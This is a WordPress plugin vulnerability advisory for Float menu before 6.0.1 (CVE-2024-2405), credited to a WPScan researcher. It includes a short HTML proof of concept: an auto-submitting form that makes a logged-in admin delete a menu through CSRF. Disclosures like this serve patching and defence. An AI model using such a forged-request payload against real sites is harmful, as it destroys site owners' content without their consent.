WordPress Plugin Vulnerabilities

Float menu < 6.0.1 - Menu Deletion via CSRF

Description

The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.

Proof of Concept

Make a logged in admin open one a page with the code below, this will make them delete the menu with ID 1:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST">
        <input type="text" name="ID" value="1"/>
        <input type="submit" value="submit">
    </form>
</body>

Affects Plugins

Plugin icon
float-menu
Fixed in 6.0.1

References

CVE
CVE-2024-2405

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
c42ffa15-6ebe-4c70-9e51-b95bd05ea04d

Timeline

Publicly Published
2024-04-11 (about 1 months ago)
Added
2024-04-11 (about 1 months ago)
Last Updated
2024-04-11 (about 1 months ago)

Other

Published
Title
Published
2024-03-29
Title
Nictitate <= 1.1.4 - Cross-Site Request Forgery
Published
2023-10-17
Title
Stripe Gateway < 7.6.1 - Cross-Site Request Forgery
Published
2024-03-25
Title
BizPrint < 4.5.6 - Cross-Site Request Forgery to Cross-Site Scripting via process.php
Published
2023-09-01
Title
Responsive Gallery Grid < 2.3.14 - Settings Update via CSRF
Published
2024-01-16
Title
Frontpage Manager <= 1.3 - Cross-Site Request Forgery via admin_page